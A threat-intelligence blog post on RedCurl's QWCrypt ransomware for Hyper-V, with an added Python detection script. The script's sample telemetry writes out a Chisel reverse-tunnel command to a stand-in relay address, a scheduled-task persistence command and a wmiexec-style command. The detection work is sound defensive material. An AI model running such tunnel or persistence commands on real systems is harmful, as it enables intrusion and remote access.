Threat Actor RedCurl Develops Ransomware to Encrypt Hyper-V Servers
RedCurl, a threat actor active since 2018 and known for stealthy corporate espionage, has begun deploying ransomware in addition to its traditional data exfiltration methods.
Researchers recently observed RedCurl using a ransomware variant called QWCrypt, designed to target virtual machines hosted on Microsoft Hyper-V, Bleeping Computer reports.
While most ransomware operations focus on VMware ESXi, QWCrypt marks a shift in targeting strategy. In a notable case, RedCurl deviated from its usual pattern by encrypting data rather than solely exfiltrating it.
The attack chain typically begins with phishing emails containing ".IMG" attachments masquerading as CVs. These files contain a malicious screensaver vulnerable to DLL sideloading, which downloads a payload and maintains persistence via scheduled tasks.
RedCurl uses stealthy, "living-off-the-land" tools, a custom wmiexec variant for lateral movement, and the tool Chisel for tunneling and RDP access.
To disable defenses before encryption, the attackers deploy encrypted 7z archives and multi-stage PowerShell scripts. QWCrypt supports various command-line arguments, such as --excludeVM to avoid disrupting key systems, and uses the XChaCha20-Poly1305 encryption algorithm.
It also supports selective or intermittent encryption for speed. The ransom note borrows text from other known ransomware families, and because RedCurl operates no known leak site, the motive behind the encryption remains unclear.
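As an added defender-side example (not code from the report, Bleeping Computer or Halcyon), the Python heuristics below flag the stages of the chain described above in simplified process-creation telemetry. The event shape, the sample events, the hypothetical file names and the wmiexec pattern (based on the stock impacket tool, since the custom variant is not described) are all assumptions.

```python
"""Heuristics for the RedCurl chain described above: a .scr lure run from a
mounted image, scheduled-task persistence spawned by that screensaver, Chisel
reverse tunnels and wmiexec-style execution, over constructed telemetry."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]  # simplified process-creation event: parent, image, cmdline

# Legitimate screensavers ship in System32; a .scr launched from anywhere else
# (e.g. a mounted .IMG attachment) matches the lure described in the report.
SYSTEM32 = "c:\\windows\\system32\\"
# Chisel client syntax: chisel client <server> R:<remote-port>:<host>:<port>
CHISEL_RE = re.compile(r"\bclient\b.*\bR:\d*:?[\w.]+:\d+", re.I)
# Stock impacket wmiexec redirects command output to the ADMIN$ share. RedCurl's
# custom variant may differ, so this pattern is an assumption, not an IoC.
WMIEXEC_RE = re.compile(r"\\\\127\.0\.0\.1\\admin\$\\__\d+", re.I)

def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, image) for every event matching one of the heuristics."""
    hits: List[Tuple[str, str]] = []
    for e in events:
        parent, image, cmd = (e.get(k, "").lower() for k in ("parent", "image", "cmdline"))
        if image.endswith(".scr") and not image.startswith(SYSTEM32):
            hits.append(("screensaver_outside_system32", image))
        if image.endswith("schtasks.exe") and "/create" in cmd and parent.endswith(".scr"):
            hits.append(("schtask_created_by_screensaver", image))
        if CHISEL_RE.search(cmd):
            hits.append(("chisel_reverse_tunnel", image))
        if parent.endswith("wmiprvse.exe") and WMIEXEC_RE.search(cmd):
            hits.append(("wmiexec_style_exec", image))
    return hits

# Constructed sample telemetry (not from the report); 203.0.113.10 is a
# documentation-range address standing in for an attacker relay.
SAMPLE_EVENTS: List[Event] = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"E:\CV_Anna.scr",
     "cmdline": r"E:\CV_Anna.scr"},
    {"parent": r"E:\CV_Anna.scr", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "C:\Users\Public\u.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\ch.exe",
     "cmdline": r"ch.exe client 203.0.113.10:8080 R:3389:127.0.0.1:3389"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1711000000 2>&1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\Bubbles.scr",
     "cmdline": r"C:\Windows\System32\Bubbles.scr /s"},  # benign, must not fire
]

if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

Each rule fires on one stage of the chain, so in a real pipeline these would be tuned against the environment's own baseline of screensaver and scheduled-task activity before alerting.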
Takeaway: RedCurl’s pivot to ransomware is yet another example of the growing convergence between cybercriminal operations and nation-state interests—a trend we’ve been warning about for years.
Researchers have laid out two key theories here. One is that RedCurl acts as contractors, taking jobs from whoever’s paying—corporate espionage, data theft, ransomware, you name it. The other is that they’re just enriching themselves quietly, skipping the splashy ransom notes and leak sites in favor of under-the-radar negotiations.
But here’s the real takeaway: we’re seeing the weaponization of criminal groups by adversarial nation-states so they can maintain plausible deniability, where the threat actors are being used as proxies to further geopolitical ambitions.
Ransomware isn’t just about money anymore—it’s also an important tool in a broader nation-state playbook. It creates chaos, ties up resources, and lets hostile governments test boundaries without leaving fingerprints.
The problem? Attribution is hard. That ambiguity ties the hands of Western governments and delays meaningful response. Meanwhile, these groups operate with impunity, often under the protection—or at the direction—of regimes that are more than happy to let them wreak havoc on foreign networks.
Until there's real accountability, including direct consequences for the governments providing safe haven for these threat actors, this cycle will only get worse. And make no mistake—something big will eventually break.
Halcyon.ai eliminates the business impact of ransomware. Modern enterprises rely on Halcyon to prevent ransomware attacks, eradicating cybercriminals’ ability to encrypt systems, steal data, and extort companies – talk to a Halcyon expert today to find out more, and check out our quarterly RaaS and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile.